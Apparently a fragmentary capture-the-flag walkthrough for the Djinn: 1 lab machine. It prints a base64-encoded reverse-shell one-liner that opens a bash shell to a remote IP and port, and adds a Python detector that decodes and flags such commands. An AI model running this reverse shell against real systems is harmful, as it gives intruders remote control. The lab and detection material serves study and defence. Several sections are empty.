DJINN: 1 — Walkthrough
- Level: Beginner-Intermediate
- flags: user.txt and root.txt
- Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to find and read two flags (user and root), which are present in user.txt and root.txt respectively.
- Format: Virtual Machine (Virtualbox — OVA)
- Operating System: Linux
Enumeration
More Enumeration
Exploitation
Let’s execute the following command to bypass the injection. The payload is base64-encoded, decoded with base64 -d, and piped to bash:
echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTkyLjE2OC4xMDMuMTM0LzQyNDIgMDwmMSAyPiYx | base64 -d | bash
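From the defender's side, the pattern above (echo of a base64 string, decoded and piped to a shell) is easy to spot in process or web-application command logs. The following is an added example, not part of the original walkthrough: the function names and the sample log are constructed for illustration, and only the encoded string is taken from the command above.

```python
import base64
import binascii
import re

# echo <base64> | base64 -d | sh/bash : encoded text decoded and run by a shell
PIPE_RE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+"
    r"(?:-d|--decode)\s*\|\s*(?:ba)?sh\b"
)
# Traits of a network-connected shell inside the decoded payload
INDICATORS = {
    "dev_tcp_redirect": re.compile(r"/dev/(?:tcp|udp)/[\w.\-]+/\d+"),
    "interactive_shell": re.compile(r"\b(?:ba)?sh\s+-[il]\b"),
    "fd_duplication": re.compile(r"\d?[<>]&\d"),
}

def inspect_command(cmdline):
    """Return (decoded_payload, indicator_names), or None if the pattern is absent."""
    m = PIPE_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return ("", ["undecodable_base64"])
    decoded = raw.decode("utf-8", "replace")
    return (decoded, [name for name, rx in INDICATORS.items() if rx.search(decoded)])

def scan(lines):
    """Return (line_number, indicators, decoded) for each line with indicators."""
    findings = []
    for n, line in enumerate(lines, 1):
        result = inspect_command(line)
        if result and result[1]:
            findings.append((n, result[1], result[0]))
    return findings

# Constructed sample log: one unrelated command, one harmless use of the same
# pipeline, and the command from this walkthrough.
BENIGN = base64.b64encode(b"echo maintenance done").decode()
SAMPLE_LOG = [
    "ls -la /opt",
    f"echo {BENIGN} | base64 -d | sh",
    "echo L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTkyLjE2OC4xMDMuMTM0LzQyNDIgMDwmMSAyPiYx | base64 -d | bash",
]

if __name__ == "__main__":
    for n, hits, decoded in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)} -> {decoded}")
```

Decoding before matching is the point: a filter or alert that only inspects the raw command text never sees the /dev/tcp redirection.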
Privilege Escalation
We have a SUID file named genie.
- Looked through the strings output of genie.
- We can see that there is another parameter, -cmd.
The same goes for /lago.